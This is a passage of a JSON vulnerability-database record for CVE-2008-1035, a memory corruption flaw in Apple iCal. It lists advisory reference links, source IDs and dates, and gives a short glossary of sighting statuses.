"url": "http://www.us-cert.gov/cas/alerts/sa08-150a.html"
},
{
"trust": 0.6,
"url": "http://www.apple.com/macosx/"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/492682/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/492638/100/100/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/492414/100/0/threaded"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/?action=item\u0026amp;id=2219"
},
{
"trust": 0.1,
"url": "http://support.apple.com/kb/ht1338?viewlocale=en_us\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://support.apple.com/kb/ht1897\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/byid?searchview\u0026query=apple_security_update_2008_003\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/reading_room/securing_browser/\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta08-150a.html\u003e"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26273/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/macosxserver1053update.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/18307/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/27093/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/macosxserver1053comboupdate.html"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/securityupdate2008003ppc.html"
},
{
"trust": 0.1,
"url": "http://support.apple.com/kb/ht1897"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/macosx1053update.html"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/securityupdate2008003serverppc.html"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/securityupdate2008003serveruniversal.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/27130/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/30430/"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector_2/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26636/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/28083/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/securityupdate2008003intel.html"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/macosx1053comboupdate.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/28081/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/18008/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/96/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/28323/"
},
{
"trust": 0.1,
"url": "http://tools.ietf.org/html/rfc4791"
},
{
"trust": 0.1,
"url": "http://pepe.com:443/pepe"
},
{
"trust": 0.1,
"url": "http://www.apple.com/downloads/macosx/calendars/"
},
{
"trust": 0.1,
"url": "http://www.icalworld.com/"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/"
},
{
"trust": 0.1,
"url": "http://enigmail.mozdev.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-2006"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-1035"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/corelabs/."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/corelabs/"
},
{
"trust": 0.1,
"url": "http://support.apple.com/kb/ht1222"
},
{
"trust": 0.1,
"url": "http://tools.ietf.org/html/rfc2445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-2007"
},
{
"trust": 0.1,
"url": "http://support.apple.com/kb/ht1338"
},
{
"trust": 0.1,
"url": "http://icalshare.com/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31160"
},
{
"db": "BID",
"id": "29412"
},
{
"db": "BID",
"id": "29486"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"db": "PACKETSTORM",
"id": "66818"
},
{
"db": "PACKETSTORM",
"id": "66804"
},
{
"db": "PACKETSTORM",
"id": "66599"
},
{
"db": "CNNVD",
"id": "CNNVD-200806-030"
},
{
"db": "NVD",
"id": "CVE-2008-1035"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31160"
},
{
"db": "BID",
"id": "29412"
},
{
"db": "BID",
"id": "29486"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"db": "PACKETSTORM",
"id": "66818"
},
{
"db": "PACKETSTORM",
"id": "66804"
},
{
"db": "PACKETSTORM",
"id": "66599"
},
{
"db": "CNNVD",
"id": "CNNVD-200806-030"
},
{
"db": "NVD",
"id": "CVE-2008-1035"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-06-03T00:00:00",
"db": "VULHUB",
"id": "VHN-31160"
},
{
"date": "2008-05-28T00:00:00",
"db": "BID",
"id": "29412"
},
{
"date": "2008-05-28T00:00:00",
"db": "BID",
"id": "29486"
},
{
"date": "2008-06-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"date": "2008-05-29T23:21:11",
"db": "PACKETSTORM",
"id": "66818"
},
{
"date": "2008-05-29T23:19:06",
"db": "PACKETSTORM",
"id": "66804"
},
{
"date": "2008-05-22T06:09:15",
"db": "PACKETSTORM",
"id": "66599"
},
{
"date": "2008-05-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200806-030"
},
{
"date": "2008-06-03T20:32:00",
"db": "NVD",
"id": "CVE-2008-1035"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31160"
},
{
"date": "2008-06-04T00:23:00",
"db": "BID",
"id": "29412"
},
{
"date": "2008-06-03T19:43:00",
"db": "BID",
"id": "29486"
},
{
"date": "2008-06-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-001405"
},
{
"date": "2021-07-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200806-030"
},
{
"date": "2024-11-21T00:43:30.690000",
"db": "NVD",
"id": "CVE-2008-1035"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "29412"
},
{
"db": "BID",
"id": "29486"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apple Mac OS X of Apple iCal Memory corruption vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-001405"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200806-030"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.